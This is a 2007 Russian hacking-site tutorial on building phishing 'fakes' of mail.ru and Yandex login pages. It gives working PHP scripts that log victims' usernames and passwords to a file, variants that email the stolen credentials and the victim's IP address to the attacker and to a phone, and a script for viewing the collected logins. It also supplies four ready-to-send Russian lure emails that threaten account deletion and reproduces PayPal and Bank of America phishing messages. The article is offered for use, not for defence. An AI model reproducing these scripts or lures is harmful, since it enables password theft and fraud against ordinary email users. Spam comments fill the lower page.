Все о фейках (fake-faq) » ..::XakepOK.ORG::..
XakepOK.ORG Logo
    
ГЛАВНАЯ  |  ФОРУМ  |  НОВОСТИ  |  СТАТЬИ  |  РЕЛИЗЫ  |  E-BOOKS  |  СКАЧАТЬ  |  WEB-TOOLS |  СНИФФЕР  |  ЮЗЕРБАРЫ  |  О НАС
Последние темы с форума
Название темы Пользователь Просмотров Ответов
INV4S10N Downloader v3.0 lexel441
BlackDownloader v.1.1 lexel521
Spider Downloader 1.0 lexel541
Reaper Downloader v2.0 lexel611
Gh0stly Downlader 2.0 lexel791
HHMultiDownloader v1.0 ( Coded in MASM & VB6 ) lexel671
BasicWebDownloader lexel762


Все о фейках (fake-faq) Категория: Статьи » Web-hack

14 сентября 2007 | Автор: nexgen | Просмотров: 1433 |
Все о фейках (fake-faq)

Материал из Википедии — свободной энциклопедии
Фи́шинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид мошенничества, цель которого — получить идентификационные данные пользователей.
Организаторы фишинг-атак используют массовые рассылки электронных писем от имени популярных брендов В эти письма они вставляют ссылки на фальшивые сайты, являющиеся точной копией настоящих. Оказавшись на таком сайте, пользователь может сообщить преступникам ценную информацию, позволяющую управлять своим счётом из интернета (имя пользователя и пароль для доступа), или, даже, номер своей кредитной карты. Успеху фишинг-афер способствует низкий уровень осведомленности пользователей о правилах работы компаний, от имени которых действуют преступники. В частности, около 5 % пользователей не знают простого факта: банки не рассылают писем с просьбой подтвердить в онлайне номер своей кредитной карты и её PIN-код.
Для защиты от фишинга производители основных интернет-браузеров договорились о применении одинаковых способов информирования пользователей о том, что они открыли подозрительный сайт, который может принадлежать мошенникам. Новые версии браузеров будут обладать такой возможностью.


В этой теме я собрал максимум информации, необходимой для создания подобных фишинг-сайтов, иначе называемых фейками(от англ. fake - подделка). Такие сайты далеко не обязательно могут применяться для хищения финансовых данных. В нашем случае они будут использоваться для похищения паролей от популярных почтовых сервисов.

Начнем с наиболее просто реализованого фейка:
Наш фейк состоит из 4 файлов: index.html, log.php, base.php, view.php.
1. index.php:
Сохраняем браузером страницу авторизации сайта, на который мы делаем фейк...например mail.ru:
Открываем сохранённый файл (любым текстовым редактором) и ищем в нём строки, похожие на эти:

Код:
			
  Теперь меняем pro/reg/mail.php на log.php
Получится

Код:

  После этого ищем строки, содержащие hidden и удаляем их.
На этом главная страница фейка готова.
2.log.php:
log.php будет обрабатывать информацию, передаваемую из index.html, а точнее - логин и пароль.
Исходник log.php:

Код:
<?PHP
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
header("Location: http://mail.ru/"); // куда пошлем пользователя после того как он ввел данные!
?>
  ?>

Логин передается в переменной name в index.html

Код:
 
			
  трока может быть и другой, главное в ней - переменная name.

Пароль передается, соответственно в переменной password

Код:
			
  На этом завершим написание скрипта, ведущего лог и перейдем к

3.base.php:


В этом файле будут храниться введенные данные.

Код:
<?php echo '
			

Доступ к базе напрямую запрещен

'; exit; ?>
  Этот код надо вписать в base.php, для того чтобы его не могли просмотреть посторонние люди.

4. view.php:

Это скрипт необходим для просмотра информации, хранящейся вфайле base.php

Вот его исходник:

Код:


View E-mail



Login:




<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'
';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'
';
break;
}
}
fclose($fp);
}
?>
  Теперь осталось залить фейк на хостинг без рекламы и начать им пользоваться )

Продолжаем тему.
Теперь напишем фейк на 3 файлах.

Файлы фейка: index.php, base.php, view.php.

1. index.php:
Как уже говорилось выше, index.php - лицо нашего фейка, теперь это лицо будет немного улучшено.

Итак, начнём:
Сначала создаём файл index.php и копируем в него всё из нашего прошлого index.html.
Теперь удаляем кусок (action="log.php") вот этой строчки,

Код:
			
  Получится

Код:

  Далее копируем наш старый log.php в самый конец файла index.php.
И добавляем в него ещё несколько строк...

Имеем:

Код:
<?PHP
if (!empty($_POST['login'])) // Вот эти строки проверяют не пустые ли логин и пароль и если нет, то скрипт выполняется дальше
if (!empty($_POST['passwd']))
{
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
header("Location: http://google.com/"); // куда пошлем пользователя после того как он ввел данные!
}
?>
  На этом index.php готов....
В него можно добавить еще несколько полезных вещей в виде проверки правильности заполнения формы:

Код:
<?
if (isset($_POST['login'])) { if (empty($_POST['login'])) {
?>


Произошла ошибка, вы не ввели логин.

<?
} }
if (isset($_POST['passw'])) { if (empty($_POST['passwd'])) {
?>


Произошла ошибка, вы не ввели пароль.

<?
} }
?>
  Это надо добавить сразу перед строками где вводится логин и пароль.

2. base.php и view.php делаем такие же как и в предыдущем пункте.

Вот еще 2 варианта скрипта, ведущего лог

Код:
<?PHP
$Login = $_POST['login']; //Логин
$Domain ="yandex"; // Например... можно заменить
$Pass = $_POST['passwd']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время

$text = "[$Data] IP:$ip MAIL:$Login@$Domain PASS:$Pass";
$to = "someone@ya.ru"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы

$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем

header("Location: http://yandex.ru/"); // сюда пошлем пользователя после того как он ввел данные
?>
  и

Код:
<?PHP
$Login = $_POST['login']; //Логин
$Domain ="yandex"; // Например... можно заменить
$Pass = $_POST['passwd']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время

$text = "[$Data] IP:$ip MAIL:$Login@$Domain PASS:$Pass";
$to = "***********"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
$tomobil = "******@шлюз мобильного оператора"; // куда присылаем данные на мобильный
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail
mail($tomobil, $sub, $text); //Отсылаем сообщение о пополнении базы на мобильный

$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем

header("Location: http://yandex.ru/"); // куда пошлем пользователя после того как он ввел данные!

?>
Тексты писем жертвам
Вариант 1


Код:
Здравствуйте *******, в связи с новой программой повышения быстродействия и улучшения качества почтовых серверов *********.ru мы просим вас пройти небольшой тест. 
Программа «быстродействие и качество» заключается в следующем: мы хотим уменьшить на наших почтовых серверах количество «ботов» и спам-отправителей.
Для этого мы проверяем всех участников нашего сервиса оригинальным тестом из нескольких заданий (аналогичных заданиям при регистрации). Эта новая система позволит нам в несколько раз уменьшить загруженность серверов и отсеять всех «ботов» и спам-отправителей.
Ссылка для теста: **************************
Нажмите на неё или скопируйте в адресную строку интернет-браузера.
Если вы не пройдете тест в течении 90 дней ваш аккаунт будет заблокирован,как неиспользующийся.
На это сообщение отвечать не нужно.
С уважением, администрация http://**********.ru.
  Вариант 2

Код:
На ваш счёт поступил перевод в размере 120 рублей, для того, чтобы принять его или отказаться, перейдите по ссылке: http://****************.
На это письмо отвечать не нужно.
С уважением администрация http://***********.ru.
  Вариант 3

Код:
ВНИМАНИЕ:
Вы были зачислены в наш чёрный список спам отправителей, ваш почтовый ящик будет заблокирован в течении 30 дней.
Если вы считайте что произошла ошибка и вы никогда не рассылали спам, то перейдите по этой ссылке: http://**************** и заполните там специальную форму.
На это письмо отвечать не нужно.
С уважением, администрация http://******.ru.
  Вариант 4

Код:
Здраствуйте уважвемый ****** .
В связи с тем, что мы проводим массовую чистку наших почтовых серверов, вы должны перейти по специальной ссылке и там повторно авторизоваться.
Ссылка для повторной авторизации: http://********************** .
Если вы не пройдете выше указанные процедуры в течении 30 дней, ваш почтовый ящик будет удален, как неиспользующийся.
На это письмо отвечать не нужно.
С уважением, администрация ***********.ru.
  И вот что недавно пришло мне на почту на gmail.com

Код:
Dear valued PayPal member,

It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

However, failure to update your records will result in account suspension. Please update your records on or before July 9, 2007.

Once you have updated your account records, your PayPal session will not be interrupted and will continue as normal.

To update your PayPal records click on the following link:
http://207.164.80.28.static.csolve.n...bin/cmd_login/


Thank you,
PayPal Update Team
  и

Код:
Bank of America  
Dear Bank of America customer,

In order to be prepared for the smart card upgrade on Visa and MasterCard debit and credit cards and to avoid
problems with our ATM services, we have recently introduced additional security measures and upgraded our
software.

The security upgrade will be effective immediately and requires our customers to update their ATM card
information. Please update your information by following the link given below.

http://www.bankofamerica.com/OnlineBanking/index.jsp


We are committed to delivering your quality service that is reliable and highly secure. This email is one of many components designed to ensure your information is safeguarded at all times.




Please do not reply to this message. For any inquiries, contact Customer Service.

Copyright 1999 - 2007 Bank of America. All rights reserved.





          Комментарии: 9
#1 Комментарий от: Mus_†ANK

24 февраля 2008 23:33 | ICQ: --
А почему первые два фрейма пустые ?
#2 Комментарий от: Сатана

20 марта 2008 15:02 | ICQ: --
Да! Они пустые, мля!
#3 Комментарий от: Дщды

24 августа 2008 17:58 | ICQ: --
Мозги поправьте и тогда не нужны будут 1 две фреймы!

А вот у меня непонятная для меня ошибка выподает!!!

Requested file /”log.php” could not be found on server img.mail_.

Помогите. Заранее благодарен
#4 Комментарий от: Ипполит

29 сентября 2008 08:41 | ICQ: --
_azoka_" _ арт фото _ Ну и еще _dekda_" _ фото букиных _, _deyot_" _ садо фото _, _etake_" _ мисс вселенная 2008 фото _, _exyxa_" _ онлайн фото _, _ezedo_" _ мисс вселенная 2008 фото _ я тут еще стока всего видел _ezoot_" _ садо фото _, _kaote_" _ фото букиных _, _koloz_" _ арт фото _, _laxty_" _ фото офиса _ Здесь тоже _ledet_" _ арт фото _ Круто, еще есть _lootx_" _ садо фото _, _lykot_" _ мисс вселенная 2008 фото _ Ну и еще _okoal_" _ садо фото _, _tooza_" _ фото букиных _ и тут тоже видел _zadee_" _ онлайн фото _, _zezya_" _ фото леры _ здесь просто ахтунг всего _zoaza_" _ фото растений _, _zotyk_" _ фото леры _ _zyeol_" _ фото растений _, _photogall_" _ фото леры _
#5 Комментарий от: Поликарп

30 сентября 2008 06:23 | ICQ: --
_properl_/" _ красивое фото _ Ну ничего _moyoy_/" _ фото 2008 _, _mazao_/" _ фото видео _, _mekla_/" _ девочки фото _, _neeek_/" _ фото бесплатное _, _nooox_/" _ девочки фото _ здесь просто ахтунг всего _noxea_/" _ фото видео _, _noody_/" _ фото 2008 _, _nexle_/" _ красивое фото _, _ollaa_/" _ фото галереи _ а скока здесь всего _ottek_/" _ красивое фото _ я тут еще стока всего видел _oxald_/" _ фото видео _, _pazla_/" _ девочки фото _ Ну ничего _potox_/" _ фото видео _, _qoyle_/" _ фото 2008 _ Здесь тоже _roxaz_/" _ фото бесплатное _, _rexly_/" _ любительское фото _ и здесь тоже глянь _rezox_/" _ фото дети _, _soole_/" _ любительское фото _ _slexo_/" _ фото дети _, _saeka_/" _ любительское фото _
#6 Комментарий от: altia

9 октября 2008 04:46 | ICQ: --
Бывают _www.spa-podarok_" _дорогие ручки паркер_, набор ручек parker/ Советы кальянщиков _www.kaneboshop_" _пристально выбирать магазин кальянов по совету_, где внимательно пояснят о принципе кальяна.
#7 Комментарий от: Алевтина

9 октября 2008 04:48 | ICQ: --
_udele_" _ фото пары _ и там _vealt_" _ военное фото _, _vadao_" _ фото каменских _, _wotel_" _ стар фото _, _wetox_" _ посмотреть фото _, _xezax_" _ стар фото _ ох скоко здесь всего _ykoza_" _ фото каменских _, _yodox_" _ военное фото _, _yaxed_" _ фото пары _, _zedox_" _ японские фото _ в придачу _zylez_" _ фото пары _ и здесь _zazez_" _ фото каменских _, _zokel_" _ стар фото _ и там _zytyl_" _ фото каменских _, _datol_" _ военное фото _ тут столько видел _dalaz_" _ посмотреть фото _, _ezoda_" _ фото золотой _ видел много разного _ekota_" _ фото стиль _, _fotak_" _ фото золотой _ _faxel_" _ фото стиль _, _gezax_" _ фото золотой _
#8 Комментарий от: Семён

10 октября 2008 07:55 | ICQ: --
_byall_" _ фото yabb _ и здесь я видалал тож _cdeal_" _ тойота фото _, _dalte_" _ фото гостиниц _, _ezxoa_" _ фото vbulletin _, _ezeya_" _ фото лорак _, _golto_" _ фото vbulletin _ посмотри еще тут _gazaa_" _ фото гостиниц _, _gaxel_" _ тойота фото _, _glayx_" _ фото yabb _, _gloxy_" _ фото mazda _ здесь просто ахтунг всего _ozela_" _ фото yabb _ ну тут вообще ахтунг всего _waxlo_" _ фото гостиниц _, _zokel_" _ фото vbulletin _ и здесь я видалал тож _zazez_" _ фото гостиниц _, _zylez_" _ тойота фото _ я тут еще стока всего видел _zedox_" _ фото лорак _, _yaxed_" _ фото берковой _ глянь еще _yelox_" _ фото санаториев _, _yodox_" _ фото берковой _
#9 Комментарий от: altia

13 октября 2008 09:12 | ICQ: --
купить parker в черемушках, _www.spa-podarok_" _авторучку продать_, бизнес сувениры для письма. Купить kerastase м проспект вернадского, _www.kaneboshop_" _реклама японская косметика магазин_

Добавление комментария

Ваше Имя:


Ваш E-Mail:





Капча:            Включите эту картинку для отображения кода безопасности
обновить код

Введите код:

Навигация
Главная
Форум
Новости

Статьи
»Web-hack
»ICQ-hack
»Cracking
»Кодинг
»Соц. инженерия
»Разное

SEO
Книги
Web-tools
PHP-прокси
Обмен файлами
Сниффер
Информер
Генератор юзербаров
IRC-канал
О нас
Вход в систему
Логин:
Пароль:
 
Топ новостей
» Китайскому хакеру грозит около 7 лет тюремного заключен ...
» C новым, 2009 годом, и Рождеством Христовым!
» Хакеры стремительно молодеют
» Фоторамки с вирусами
» В 2009 г. будут «править» банковские трояны и лже-антив ...
» УФАС признала спамеров виновными в нарушении закона о р ...
» Хакеры скомпрометировали данные 1,5 млн клиентов банка ...
» Украинские СМИ записали Ющенко в хакеры
» Украинским провайдерам предложили облагородить интернет
Опрос
Кто такой по-вашему хакер?

Это - Я!!!
Жаждущий знаний
Преступник
Ну я даже не знаю...
Герой нашего времени
Сесть мы всегда успеем


Друзья сайта
..::XakNet.Ru::..
..::GraBBerZ.CoM::..
Eugen.SU Webt00lZ
TEM.DP.UA
..::Illmax.ru::..
..::qseZ.ORG::..
..::Tolpa.ORG::..
..::ProLogic.ws::..
52Nn TeaM
hacklab.org.ru
..::web-a.info::..
Indetails.info
.::VzloM.IN::.
Evil Forest
.:BlackHack.Ru:.
Планету-хакерам
...::ICQ Primary Base::...
TGBR Community
Ссылки
Счетчики:
дизайн сайта: Rock Technologies — достичь вершин